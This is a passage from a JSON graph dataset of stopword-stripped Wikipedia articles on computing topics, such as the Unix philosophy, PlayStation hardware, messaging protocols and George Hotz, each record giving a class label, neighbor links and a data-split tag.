accessed scripting languages 13 new wmi providers included addition dhtml coupled scripting languages even powershell used create desktop gadgets gadgets also created configuration various aspects system",
    "neighbors": [
      2568,
      3723,
      8080,
      2193,
      6674,
      9874,
      3351,
      4248,
      537,
      9114,
      6812,
      8988,
      929,
      9762,
      4771,
      10020,
      11683,
      7847,
      1577,
      10026,
      2603,
      1581,
      2221,
      1844,
      1077,
      9780,
      7863,
      9910,
      11572,
      6972,
      6462,
      319,
      960,
      1348,
      8391,
      1098,
      10828,
      4174,
      5969,
      3283,
      8659,
      11605,
      603,
      3547,
      479,
      617,
      4074,
      2027,
      5225,
      10993,
      3573,
      10486,
      9593,
      10747,
      6396
    ],
    "mask": "Test"
  },
  {
    "node_id": 9506,
    "label": 5,
    "text": "Van_Jacobson_TCP/IP_Header_Compression:van jacobson tcp/ip header compression van jacobson tcp/ip header compression data compression protocol described rfc 1144 specifically designed van jacobson improve tcp/ip performance slow serial links van jacobson compression reduces normal 40 byte tcp/ip packet headers 3-4 bytes average case saving state tcp connections ends link sending differences header fields change makes big difference interactive performance low speed links although anything processing delay inherent dialup modems van jacobson header compression also vj compression header compression option versions ppp versions serial line internet protocol slip vj compression often called cslip compressed slip",
    "neighbors": [
      1030,
      8432,
      8627,
      5531,
      8669
    ],
    "mask": "Test"
  },
  {
    "node_id": 9507,
    "label": 2,
    "text": "Unix_philosophy:unix philosophy unix philosophy originated ken thompson set cultural norms philosophical approaches minimalist modular software development based experience leading developers unix operating system early unix developers important bringing concepts modularity reusability software engineering practice spawning software tools movement time leading developers unix programs ran established set cultural norms developing software norms became important influential technology unix termed unix philosophy unix philosophy emphasizes building simple short clear modular extensible code easily maintained repurposed developers creators unix philosophy favors composability opposed monolithic design unix philosophy documented doug mcilroy bell system technical journal 1978 later summarized peter h. salus quarter-century unix 1994 award-winning unix paper 1974 ritchie thompson quote following design considerations preface 1984 book unix programming environment brian kernighan rob pike bell labs give brief description unix design unix philosophy authors write goal book communicate unix programming philosophy october 1984 brian kernighan rob pike published paper called program design unix environment paper criticize accretion program options features found newer unix systems 4.2bsd system v explain unix philosophy software tools performing one general function authors contrast unix tools cat larger program suites used systems mcilroy head bell labs computing sciences research center inventor unix pipe summarized unix philosophy follows beyond statements also emphasized simplicity minimalism unix programming conversely mcilroy criticized modern linux software bloat remarking adoring admirers fed linux goodies disheartening state obesity contrasts earlier approach taken bell labs developing revising research unix stated mcilroy generally accepted throughout unix community unix programs always expected follow concept dotadiw one thing well limited sources acronym dotadiw internet discussed length development packaging new operating systems especially linux community patrick volkerding project lead slackware linux invoked design principle criticism systemd architecture stating attempting control services sockets devices mounts etc. within one daemon flies face unix concept one thing well book art unix programming first published 2003 eric s. raymond american programmer open source advocate summarizes unix philosophy kiss principle keep simple stupid provides series design rules 1994 mike gancarz member team designed x window system drew experience unix well discussions fellow programmers people fields depended unix produce unix philosophy sums nine paramount precepts richard p. gabriel suggests key advantage unix embodied design philosophy termed worse better simplicity interface implementation important attributes system—including correctness consistency completeness gabriel argues design style key evolutionary advantages though questions quality results example early days unix used monolithic kernel means user processes carried kernel system calls user stack signal delivered process blocked long-term i/o kernel done signal delayed possibly long time maybe indefinitely i/o completed signal handler could executed process kernel mode sensitive kernel data stack kernel back-out system call store replay restart later assuming signal handler completes successfully cases ken thompson dennis ritchie favored simplicity perfection unix system would occasionally return early system call error stating done nothing—the interrupted system call error number 4 codice_1 today systems course call aborted order call signal handler could happen handful long-running system calls codice_2 codice_3 codice_4 codice_5 plus side made i/o system many times simpler design understand vast majority user programs never affected handle experience signals codice_6 would die right away one raised programs—things like shells text editors respond job control key presses—small wrappers could added system calls retry call right away codice_1 error raised thus problem solved simple manner 1981 article entitled truth unix user interface horrid published datamation norman criticized design philosophy unix lack concern user interface writing background cognitive science perspective then-current philosophy cognitive engineering focused end users comprehend form personal cognitive model systems -- case unix fail understand result disastrous mistakes losing hour worth work easy",
    "neighbors": [
      10753,
      657,
      9747,
      10387,
      2599,
      7975,
      9511,
      7983,
      8499,
      52,
      9908,
      950,
      823,
      4409,
      7483,
      701,
      2109,
      7872,
      3522,
      4433,
      9298,
      8020,
      477,
      8414,
      10590,
      6369,
      1256,
      237,
      4589,
      5357,
      5492,
      11255,
      11262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9508,
    "label": 3,
    "text": "PlayStation_Now:playstation playstation ps cloud gaming subscription service developed sony interactive entertainment service allows members stream playstation 2 playstation 3 playstation 4 games playstation 4 pc playstation 2 playstation 4 games also available download playstation 4 non-playstation devices need dualshock 3 4 xinput-compatible controller xbox game pad use service members intend stream games sony recommends players 5 mbps internet connection achieve good performance playstation announced january 7 2014 2014 consumer electronics show ces sony presented demos last us puppeteer playable ps bravia tvs playstation vita closed beta began united states january 28 ps3 may 19 extended ps4 implement service sony created single motherboard equivalent 8 ps3 console units server rack allow games function opposed software emulation due architectural complexity playstation launched open beta united states canada ps4 july 31 2014 ps3 september 18 2014 ps vita ps tv october 14 2014 support select 2014 bravia tvs coming later year gamescom 2014 sce announced ps would arrive europe 2015 united kingdom first european country access service december 24 2014 sony announced playstation would expand electronic brands ces 2015 sony confirmed playstation would arrive north america ps4 full release january 13 2015 march 7 2015 revealed playstation accessible europe official beta invites europe started going ps4 owners april 15 2015 february 17 2017 sony announced would discontinue playstation playstation 3 playstation vita playstation tv sony bravia televisions modeled 2013–15 sony blu-ray players samsung televisions august 15 2017 september 20 2018 sony announced users playstation 4 would able download playstation 2 playstation 4 games offered via service sony started gradually roll new feature subscribers playstation 3 games however able downloaded playstation 3 architecture different playstation 4 january 23 2019 sony announced service would launching spain italy portugal norway denmark finland sweden later year beta countries launched early february full service launched march 12 2019 currently playstation 2 playstation 3 playstation 4 games service streamed playstation 4 pc 2019 750 games available 300 available download playstation 4 new games added every month 7-day free trial three pricing options north america subscription service 19.99 one month 44.99 3 months 99.99 12 months two pricing options france germany belgium netherlands luxembourg €14.99 one month €99.99 12 months playstation includes access online multiplayer playstation 3 playstation 4 games playstation currently available austria belgium canada denmark finland france germany ireland italy japan luxembourg netherlands norway portugal spain sweden switzerland united states qatar united kingdom",
    "neighbors": [
      10368,
      643,
      9091,
      3077,
      11398,
      10761,
      6797,
      6799,
      10900,
      10270,
      10782,
      6311,
      9512,
      7722,
      684,
      9262,
      306,
      1587,
      1091,
      9543,
      10056,
      6909,
      5067,
      6732,
      10316,
      3152,
      6738,
      4951,
      6873,
      859,
      4060,
      8413,
      607,
      359,
      231,
      8937,
      9063,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 9509,
    "label": 5,
    "text": "Collaber:collaber collaber collaboration software built eclipse software rcp collaber features include file sharing task management shared calendar group discussion contains tools like address book backup tool calendar chat discussion database file tool tasks notepad picture polls shared folder wiki web links tool collaber 1.1 released completely new architecture enable users download account information anywhere device functionality collaber appears similar microsoft groove unlike groove limited microsoft windows platform collaber supported microsoft windows mac os x linux even though originally designed p2p architecture similar microsoft groove switched client server model appears better reliability compared p2p model collaber client automatically synchronized collaber server connects internet changes done workspace sent members synchronized users collaber install number systems installations always stay sync see data system without manual intervention concept workspace core working collaber users create workspace workspace 15 built tools tools data inside tool shared members workspace collaber developed vimukti technologies based hyderabad india",
    "neighbors": [
      8640,
      2465,
      2658,
      11208,
      4171,
      5612,
      823,
      6797,
      6998,
      1687,
      11446,
      3583
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9510,
    "label": 3,
    "text": "Realms_of_Darkness:realms darkness realms darkness fantasy video game developed strategic simulations released 1986 developed apple ii commodore 64 object game completion seven different quests 30 dungeon levels exploration several cities shops wilderness areas ssi sold 9,022 copies realms darkness north america computer gaming world called game moderate interest described graphics quests puzzles mediocre stated game might suitable beginner computer rpgs compute called realms darkness well-planned product several interesting features previously implemented fantasy game fantasy gamers want take look game reviewed 1987 dragon 122 patricia lesser role computers column lesser felt game combines excitement danger menu-driven fantasy role-playing game flexibility thought-provoking requirements text-adventure game game revisited dragon 124 reviewers stated realms darkness enjoyable despite mediocre graphics ’ immerse secrets many many hours",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 9511,
    "label": 5,
    "text": "Zephyr_(protocol):zephyr protocol created mit part project athena zephyr designed instant messaging protocol application-suite heavy unix background using one thing well philosophy unix made several separate programs working together make complete messaging system zephyr irc first widely used ip-based instant-messaging systems zephyr invention ciarán anthony dellafera time employee digital equipment corporation visiting research scientist project athena design originated solution reverse remote procedure call rpc problem service providers servers client–server system locate communicate service users initial concept emerged conversations ciarán michael r. gretzinger another systems engineer project athena early 1986 mid late 1986 ciarán distilled problem two specific issues ability locate users distributed computing environment known today presence detection ability deliver scalable light-weight authentic messages distributed computing environment zephyr development team mark w. eichin robert s. french david c. jedlinsky john t. kohl william e. sommerfeld responsible creation initial code-base subsequent releases issued throughout late 1980s zephyr still use today university environments carnegie mellon iowa state university maryland college park brown university mit largely replaced modern popular instant messenger systems xmpp mit currently operates zephyr xmpp zephyr uses udp datagrams sent ports 2102 2103 2104 incompatible routers nat reports internal ip address returning datagrams incorrectly routed sites deployed zephyr using kerberos 4 authentication exclusively though late 2007 sites including iowa state deployed zephyr using kerberos 5",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      3847,
      649,
      4746,
      1036,
      9868,
      11408,
      3218,
      9365,
      10005,
      11413,
      3610,
      5402,
      3228,
      5531,
      3742,
      10271,
      3105,
      9507,
      9380,
      2085,
      9381,
      3751,
      3752,
      1962,
      10924,
      9519,
      562,
      2996,
      9909,
      8758,
      1467,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      1218,
      6208,
      7364,
      6982,
      2887,
      2760,
      6855,
      1738,
      8265,
      2892,
      2509,
      4687,
      6993,
      5843,
      3284,
      2904,
      5469,
      4318,
      5470,
      5471,
      5472,
      3812,
      4068,
      6628,
      9572,
      10341,
      10344,
      11112,
      367,
      8432,
      5492,
      3959,
      7928,
      6651,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 9512,
    "label": 3,
    "text": "PlayStation_2_models:playstation 2 models many revisions playstation 2 ps2 history 2000 2013 internal construction others involving substantial external changes colloquially known among ps2 hardware hackers v0 v1 v2 ... v18 region receives different model number example v18 released north america scph-90001 australia scph-90002 hong kong scph-90006 final digit region code bearing hardware many games dvds restricted certain regions system software displays different languages ps2 primarily differentiated models original fat case design slimline models introduced end 2004 2010 television incorporating ps2 introduced three original ps2 launch models scph-10000 scph-15000 scph-18000 sold japan lacked expansion bay later ps2 models models instead included pcmcia slot scph-10000 scph-15000 built-in dvd movie playback instead relied encrypted playback software copied memory card included cd-rom normally ps2 execute encrypted software memory card see ps2 independence exploit v3 substantially different internal structure subsequent revisions featuring several interconnected printed circuit boards v4 everything except power supply unified onto one board v5 introduced minor internal changes difference v6 sometimes called v5.1 v5 orientation power/reset switch board connector reversed prevent use no-solder modchips v5 also introduced reliable laser ones used previous models v7 v8 included minor revisions v6 also scph-30001 50001 90001 models beginning model scph-500xx i.link port removed infrared receiver added use remote control dvd playback leaving controller ports free external receiver ps2 standard color matte black several different variations color produced different quantities regions including ceramic white light yellow metallic blue aqua metallic silver navy star blue opaque blue astral blue opaque black midnight black pearl white sakura purple satin gold satin silver snow white super red transparent blue ocean blue also limited edition color pink distributed regions including oceania parts asia small playstation logo front disc tray could rotated 90 degrees order logo right way vertical horizontal console orientations feature also used slimline consoles playstation 3 september 2004 sony unveiled third major hardware revision v12 model number scph-700xx available late october 2004 smaller thinner quieter older versions includes built-in ethernet port markets also integrated modem due thinner profile contain 3.5 expansion bay therefore support internal hard disk drive also lacks internal power supply similar gamecube modified multitap expansion removal expansion bay criticized limitation due existence titles final fantasy xi require use hdd official ps2 linux also requires expansion bay function currently modified multitap sold stores however also compatible older versions also added support multiple memory cards games third-party connectors soldered unit giving hard drive support due still containing necessary i/o controllers firmware process involved requiring user solder 39 ide pinouts directly board two special aftermarket kit created make mod easier consumer first hd connect simply board sat attached back console communication wires taped ps2 air vents drive power one 5 v usb headers second expensive option hd combo included replacement case room hard drive certain modchips enable use usb hard drive mass storage device two sub-versions scph-700xx one old emotion engine ee graphics synthesizer gs chips newer unified ee+gs chip otherwise identical sub-versions variously referred v12 models v11.5 older v12 newer model v12 older v13 newer model v12 model first released black silver edition available united kingdom germany australia united arab emirates gcc countries france italy south africa north america limited edition pink console also became available march 2007 v12 v13 succeeded v14 scph-7500x contains different asics previous revisions chips copyright date 2005 compared 2000 2001 earlier models also different lens compatibility issues different number playstation games even ps2 games addon add hdd support newer 7500x onward models called hdpro created limited success beginning 2005 found black slimline console power transformers manufactured august december 2004 defective could overheat units recalled sony replaced 2005 model later hardware revisions better compatibility playstation games metal gear solid vr missions operates silver models however new japanese slim models issues playing playstation games first ps2 revisions 2006 sony released new hardware revisions v15 model numbers scph-7700x scph-7700x v15 first released japan september 15 2006 including silver edition release japan released north america europe parts world new revision uses integrated unified ee+gs chip redesigned asic different laser lens updated bios updated drivers july 2007 sony started shipping revision slimline playstation 2 scph-7900x featuring reduced weight 600 grams compared 900 g scph-7700x achieved reduction parts unit also uses smaller motherboard well custom asic houses ee gs rdram ac adaptor weight reduced 250 g previous 350 g. another refinement slimline playstation 2 scph-9000x released japan november 22 2007 well cosmetic changes design hardware overhauled incorporating power supply console like original fat playstation 2 revisions also increases total weight scph-9000x series consoles manufactured third quarter 2008 last revision playstation 2 changes made indicated date code 8c incorporate revised bios disables exploit present older models allowed homebrew applications launched memory card sony also manufactured consumer device called psx used digital video recorder dvd burner addition playing ps2 games device released japan december 13 2003 first sony product include xrossmediabar interface sell well japan released anywhere else psx featured one usb port memory stick card reader two playstation 2 memory card slots released 2010 sony bravia kdl22px300 22 inch 56 cm 720p television incorporates playstation 2 console four hdmi ports 720p tv also includes bravia internet video access allowing users access streaming services youtube on-demand television released europe although maximum resolution 720p/1366×768 1080p input sources used displayed",
    "neighbors": [
      4098,
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      684,
      306,
      1587,
      1091,
      9543,
      10056,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      5215,
      607,
      1121,
      359,
      8937,
      1515,
      1776,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "None"
  },
  {
    "node_id": 9513,
    "label": 4,
    "text": "Collaboration-oriented_architecture:collaboration-oriented architecture collaboration oriented architecture coa computer system designed collaborate use services systems outside operators control collaboration oriented architecture often use service oriented architecture deliver technical framework collaboration oriented architecture ability collaborate systems based jericho forum principles commandments bill gates craig mundie microsoft clearly articulated need people work outside organizations secure collaborative manner opening keynote rsa security conference february 2007 successful implementation collaboration oriented architecture implies ability successfully inter-work securely internet typically mean resolution problems come de-perimeterisation term collaboration oriented architectures defined developed meeting jericho forum meeting held hsbc 6 july 2007 key elements qualify security architecture collaboration oriented architecture follows working collaborative multi-sourced environment implies need authentication authorization accountability must interoperate exchange outside locus area control",
    "neighbors": [
      9113,
      9858,
      9954
    ],
    "mask": "Test"
  },
  {
    "node_id": 9514,
    "label": 8,
    "text": "DAML-S:daml-s darpa agent markup language services daml-s semantic markup language describing web services related ontologies daml-s built top daml+oil daml-s superseded owl-s",
    "neighbors": [
      1481,
      10020
    ],
    "mask": "None"
  },
  {
    "node_id": 9515,
    "label": 0,
    "text": "Reification_(linguistics):reification linguistics reification natural language processing refers natural language statement transformed actions events become quantifiable variables example john chased duck furiously transformed something like another example would sally said john mean could expressed something like representations allow one use tools classical first-order predicate calculus even statements due use tense modality adverbial constructions propositional arguments e.g sally said x etc. would seemed intractable advantage predicate calculus better understood simpler complex alternatives higher-order logics modal logics temporal logics etc exist better automated tools e.g automated theorem provers model checkers manipulating reified forms used purposes besides application first-order logic one example automatic discovery synonymous phrases reified forms sometimes called quasi-logical forms existential variables sometimes treated skolem constants natural language constructs admit uniform translation first order logic see donkey sentence examples discussion",
    "neighbors": [
      7780
    ],
    "mask": "None"
  },
  {
    "node_id": 9516,
    "label": 3,
    "text": "King_&_Balloon:king amp balloon player controls two green men orange cannon stationed parapet castle fires fleet hot-air balloons cannon king moves slowly back forth ground balloons return fire dive toward balloon reaches ground sit king walks time lifts player must shoot balloon free king parachute safely ground times two diving balloons combine form single larger one awards extra points splits apart hit cannon destroyed collision balloons shots replaced brief delay effect number remaining lives one life lost whenever balloon carries king top screen game ends lives lost galaxian round number stops increasing round 48 king speaks captured help rescued thank carried away bye bye balloons make droning sound aliens galaxian released previous year cannon shots also make sound player ship galaxip game original japanese version game king speaks english heavy japanese accent saying herupu help sankyū thank baibai bye bye u.s. version game features different voice king without japanese accent rare glitch game psp port game namco museum battle collection sometimes glitch happen overlapping continue option repeatedly reaches level 72 far away limit press 1p start glitch level 72 game encounter glitch rendering high score z another glitch features split second opening animation play level resulting blank screen copyright info level ca n't played sounds repeated synth drone must press start quit game quitting level 72 king balloon later featured namco museum encore playstation japan-only release made north american console debut namco museum battle collection psp player could choose king voice original japanese later u.s. version unlocking manic settings also appeared namco museum virtual arcade xbox 360 well namco museum megamix wii",
    "neighbors": [
      11522,
      3533,
      9006,
      8942,
      1776,
      10287,
      10931,
      8663
    ],
    "mask": "Test"
  },
  {
    "node_id": 9517,
    "label": 4,
    "text": "Lincoln_D._Faurer:lincoln d. faurer lieutenant general lincoln d. faurer february 7 1928 – november 7 2014 united states air force officer served director national security agency chief central security service 1981 1985 faurer born february 7 1928 medford massachusetts graduated central high school philadelphia 1945 attended cornell university graduated united states military academy west point new york 1950 bachelor science degree commission second lieutenant received master science degree engineering management rensselaer polytechnic institute new york 1964 faurer completed national war college fort lesley j. mcnair washington d.c. 1968 concurrently earned master degree international affairs george washington university also washington d.c. graduation united states military academy faurer attended flying schools goodfellow air force base texas vance air force base oklahoma received pilot wings august 1951 completed b-29 pilot training randolph air force base texas january 1952 assigned 308th bombardment wing forbes air force base kansas may 1952 moved wing hunter air force base georgia april 1953 september 1955 faurer flew weather reconnaissance flights wb-29s 56th weather reconnaissance squadron yokota air base japan aerial observer training james connally air force base texas faurer returned forbes air force base may 1956 rb-47 aircraft commander 320th strategic reconnaissance squadron may 1958 transferred headquarters 90th strategic reconnaissance wing also forbes chief training procedures section faurer began career missile space fields august 1959 assigned headquarters 2nd air force barksdale air force base louisiana serving successively operations officer missile section guided missiles operations officer chief missile branch training division directorate operations barksdale associated 2nd air force growing inventory intercontinental ballistic missiles atlas e f titan ii minuteman i. faurer attended graduate engineer management program rensselaer polytechnic institute june 1963 july 1964 graduation assigned defense intelligence agency washington d.c. directorate scientific technical intelligence served technical intelligence officer development engineer later chief space systems division missiles space office july 1967 upon graduation national war college july 1968 faurer named director current operations 14th aerospace force ent air force base colorado served commander 16th surveillance squadron shemya air force base alaska august 1969 september 1970 appointed commander 71st missile warning wing mcguire air force base new jersey faurer assigned director j-2 united states southern command canal zone july 1971 june 1973 transferred headquarters u.s. air force washington d.c. duty deputy assistant chief staff intelligence may 1974 faurer returned defense intelligence agency deputy director intelligence july 1976 became vice director production assigned director j-2 u.s. european command vaihingen west germany august 1977 moved brussels belgium august 1979 deputy chairman north atlantic treaty organization military committee became director national security agency april 1981 faurer military decorations awards include air force distinguished service medal defense superior service medal oak leaf cluster legion merit meritorious service medal joint service commendation medal oak leaf cluster air force commendation medal oak leaf cluster faurer also presented national intelligence medal achievement recognition service national intelligence community faurer promoted lieutenant general september 1 1979 date rank retired april 1 1985 faurer president corporation open systems not-for-profit industry research center promotion osi isdn international communications standards 1986 1991 served chairman association intelligence officers consults national security issues 1990s linc faurer also served board directors aegis research corporation rosslyn later falls church virginia chairman board directors national cryptologic museum foundation october 2014 faurer died november 7 2014 buried arlington national cemetery",
    "neighbors": [
      6017,
      8726,
      1189,
      1838,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 9518,
    "label": 4,
    "text": "George_Hotz:george hotz george francis hotz born october 2 1989 alias geohot american hacker creative consumer known unlocking iphone allowing phone used wireless carriers contrary apple intentions developed limera1n jailbreak tool bootrom exploit ios also noted technical efforts publicity reverse engineering playstation 3 video game console subsequently sued settling sony september 2015 working vehicle automation machine learning company comma.ai attended bergen county academies magnet public high school hackensack new jersey attended academy engineering design technology hotz alumnus johns hopkins center talented youth program hotz also briefly attended rochester institute technology carnegie mellon university august 2007 seventeen-year-old george hotz became first person reported carrier-unlock iphone according hotz blog traded second unlocked 8 gb iphone terry daidone founder certicell nissan 350z three 8 gb iphones september 2007 anonymous group achieved software-only unlocking method complement hotz hardware-based unlocking method july 13 2010 hotz announced discontinuation jailbreaking activities citing demotivation technology unwanted personal attention nevertheless continued release new software-based jailbreak techniques october 2010 december 2009 hotz announced initial intentions breach security sony playstation 3 five weeks later january 22 2010 announced performed first theoretical achievement consists initial read write access machine system memory well hypervisor level access machine cpu january 26 2010 hotz released exploit public march 28 2010 sony responded announcing intention release playstation 3 firmware update would remove otheros feature models feature already absent newer slim revisions machine july 13 2010 never achieved method reading installing modifying software ps3 hotz posted message twitter account stating abandoned efforts trying crack ps3 due system security extreme difficulty december 29 2010 notable hacking group fail0verflow known reverse engineering security models found consumer electronics devices performed academic presentation 27th chaos communications congress technical conference accomplishments playstation 3 presented methods 'd devised successfully penetrated device security model yielding root signing encryption keys keys essential element full even minimally usable breach capable installing running new software playstation 3 unit january 2 2011 hotz posted copy root keys playstation 3 website keys later removed website result legal action sony fail0verflow hotz response continued publication ps3 exploit information sony filed january 11 2011 application temporary restraining order tro us district court northern california january 14 2011 hotz appeared interview g4 loop explained involvement playstation 3 root keys console published sony initiated litigation george hotz predecessor playstation 3 hacking group known fail0verflow hotz published commentary case including song disaster sony sony turn demanded social media sites including youtube hand ip addresses people visited geohot social pages videos latter case watched video 'documents reproducing records usernames ip addresses posted published comments response video paypal granted sony access geohot paypal account judge case granted sony permission view ip addresses everyone visited geohot.com april 2011 revealed sony hotz settled lawsuit court condition hotz would never resume hacking work sony products end april 2011 anonymous hacker broke playstation network stole personal information 77 million users hotz denied responsibility attack said running homebrew exploring security devices cool hacking someone else server stealing databases user info cool led 2011 playstation network incident time sony aware compromised accounts system june 2014 hotz published root exploit software hack samsung galaxy s5 devices used us market exploit built around linux kernel cve-2014-3153 discovered hacker pinkie pie involves issue futex subsystem turn allows privilege escalation exploit known towelroot designated one-click android rooting tool hacking community designed installed quickly like app rooting hacks typically uploaded nearby pc cable necessitated rebooting device special set key presses although originally released verizon galaxy s5 root exploit made compatible android devices available time example tested found work galaxy s5 nexus 5 galaxy s4 active updates continued applied root exploit increase capabilities devices running android updates android operating system closed source exploit samsung officially responded towelroot exploit releasing updated software designed immune exploit addition made meaningful side income public donations solicited exploits hotz employed facebook google june 27 2011 zdnet freelance reporter emil protalinski reported according facebook spokesman hotz hired company unknown role however according cnet article actually employed since may confirmed facebook january 2012 hotz longer employed facebook july 16 2014 google hired hotz work software security auditing team called project zero hopes find zero-day vulnerabilities nsa hotz worked project zero 5 months developed qira open source program dynamically analysing application binaries january 2015 vicarious.com hired hotz develop ai algorithms worked 7 months hotz founded ai startup comma.ai september 2015 interview bloomberg hotz revealed company building vehicular automation technology based artificial intelligence algorithms hotz built working self-driving 2016 acura ilx demonstrated i-280 video resulting cease desist letter california department motor vehicles hotz wanted sell technology tesla motors meeting ceo elon musk tesla later released statement website citing corrections bloomberg article stressing autopilot system developed in-house vision chip component mobileye instead one separate autopilot system manufactured mobileye suggested bloomberg reporter ashlee vance tesla ceo elon musk offered advice hotz self-driving car project december 2015 interview october 27 2016 nhtsa informed hotz product legally required comply federal motor vehicle safety standards requested information would confirm compliance day later george hotz tweeted shenzhen comma one cancelled kristen lee stated jalopnik nhtsa simply trying open dialog commented instead got worst attitude possible silicon valley try regulate us thought leaders ’ take ball go home comma.ai open sourced self driving car software called openpilot november 30 2016 emphasizing intended use research without warranty september 14th 2018 comma.ai announced hotz would become head research team project appointed riccardo biasini new ceo company left march 2019 returned may 2019 become president hotz finalist 2004 isef competition portland oregon project mapping robot recognition included interviews today show larry king hotz finalist 2005 isef competition project googler continuing robots hotz competed school highly successful titanium knights battlebots team hotz competed 2007 intel international science engineering fair science competition high school students 3d imaging project entitled want holodeck received awards prizes several categories including 20,000 intel scholarship travelled sweden speak project stockholm international youth science seminar hotz received considerable attention mainstream media including interviews today show fox cnn nbc cbs g4 abc cnbc articles several magazines newspapers websites including forbes bbc march 2008 pc world magazine listed hotz one top 10 overachievers 21 august 2013 hotz attended def con carnegie mellon plaid parliament pwning ppp ppp placed first def con capture flag ctf tournament later 2013 hotz also competed csaw 2013 working alone hotz took first place pseudonym tomcr00se august 2014 hotz competed part carnegie mellon plaid parliament pwning win def con ctf tournament second year row team also def con crack tournament south southwest 2019 hotz discussed simulation theory announced plans create church dedicated helping society break simulation",
    "neighbors": [
      1024,
      5636,
      5138,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      2130,
      1622,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      161,
      684,
      9904,
      9395,
      8886,
      7359,
      1222,
      3789,
      4304,
      9424,
      8918,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      8937,
      10477,
      9460,
      7418,
      2811,
      2815,
      3843,
      10502,
      11017,
      268,
      10003,
      5927,
      297,
      2857,
      8489,
      11052,
      1337,
      2885,
      6474,
      6484,
      857,
      1882,
      7515,
      4445,
      4957,
      3956,
      9082,
      11137,
      11152,
      3473,
      10132,
      6555,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      5047,
      441,
      1979,
      4027,
      9664,
      8133,
      2502,
      4054,
      7639,
      8664,
      1504,
      9186,
      7147,
      2542,
      8691,
      507
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9519,
    "label": 5,
    "text": "OSCAR_protocol:oscar protocol oscar open system communication realtime aol proprietary instant messaging presence information protocol used aol aim instant messaging system icq despite name specifications protocol remain proprietary aol gone great lengths keep competitors namely microsoft xmpp cerulean studios implementing compatible clients proprietary messaging systems 2002 aol signed contract apple inc. allowing use oscar well aol code libraries ichat application allowed ichat users interact icq aim users directly deal also permitted users apple .mac service log aim network using .mac email addresses carried apple mobileme service oscar protocol used separately aol network fact aol expands general concept oscar adding systems service side buddy lists icons well features file transfers using bonjour march 6 2006 aol released aim sdk launched developer website allowing developers build plugins aim triton build custom clients connect oscar protocol point however released information protocol march 5 2008 aol released portions oscar protocol documentation google also provided ability sign aim network via google talk client built gmail packets sent oscar encapsulated manner 16-bit integers sent network unsigned big endian see endianness 32-bit integers 8-bit integers bytes special frame layer protocol flap container encloses every packet carries information packet size channel number sequence within almost every packet sent channel 2 packets contain snac simple network atomic communication always either one zero contained packet therefore contain need length",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      8582,
      4746,
      1036,
      11408,
      5784,
      3610,
      3228,
      10271,
      3105,
      9511,
      1962,
      5677,
      8758,
      1467,
      10173,
      6208,
      1218,
      8644,
      6982,
      6855,
      2760,
      8262,
      1738,
      2892,
      3284,
      4318,
      3812,
      4068,
      6628,
      9572,
      488,
      4457,
      8554,
      10470,
      3959,
      7928,
      10748,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9520,
    "label": 2,
    "text": "Xenocara:xenocara xenocara openbsd build infrastructure project customised x.org server utilises dedicated _x11 user default drop privileges perform privilege separation accordance openbsd least privilege policy patches applying rather important security protection provided upstream benefit unix-like systems linux however care apply maintain unfortunately happened date release 6.9 x.org used imake recent modularised versions switched gnu autotools xenocara uses bsd make designed ease building maintenance modularised x.org within openbsd cvs tree first appeared openbsd 4.2 released openbsd different build system repositories x cvs since completely retired favour xenocara apart x.org xenocara builds several projects including window managers fvwm cwm",
    "neighbors": [
      1668,
      9223,
      10631,
      2825,
      3465,
      1932,
      274,
      7702,
      10105,
      4398,
      6702,
      7983,
      2245,
      1993,
      8778,
      3404,
      11086,
      5970,
      5084,
      7139,
      1637,
      4071,
      5230,
      1785,
      8954
    ],
    "mask": "Test"
  },
  {
    "node_id": 9521,
    "label": 8,
    "text": "Influenster:influenster influenster product discovery reviews platform consumers influenster uses social media analytics measure users ’ influence social media influenster launched 2010 ios app influenster launched 2014 android app launched 2015 january 2018 influenster community consists 4 million users influenster platform consisting 11 million reviews 880,000 new reviews generated month products represent 100k consumer brands 1.7 million product pages users review ask/answer questions upload photos/videos based user impact score supplied demographic information invited influenster campaigns influenster runs variety different types campaigns generally involve sending invited users complimentary product service sample discuss social media sampling user asked complete final market-research survey influenster offers coupons offers partner retailers brands users access product discovery experience platform uses facebook twitter instagram youtube tumblr foursquare google+ multi-platform blog widget friend referrals determine impact score impact points largely calculated based number followers friends user given social network influenster allows users unlock expert lifestyle badges completing survey questions interests behaviors writing reviews products answering users questions sharing influenster product pages across social media channels badges part gamification system reward specific types users invites specific influenster campaigns matching demographic primary business model influenster involves brands working influenster voxbox virtualvox campaigns voxbox virtualvox campaigns brands offer complimentary products digital rewards influenster users meet brand product-specific criteria 2016 influenster raised 8 million financing ebates leading online cashback shopping service",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9522,
    "label": 0,
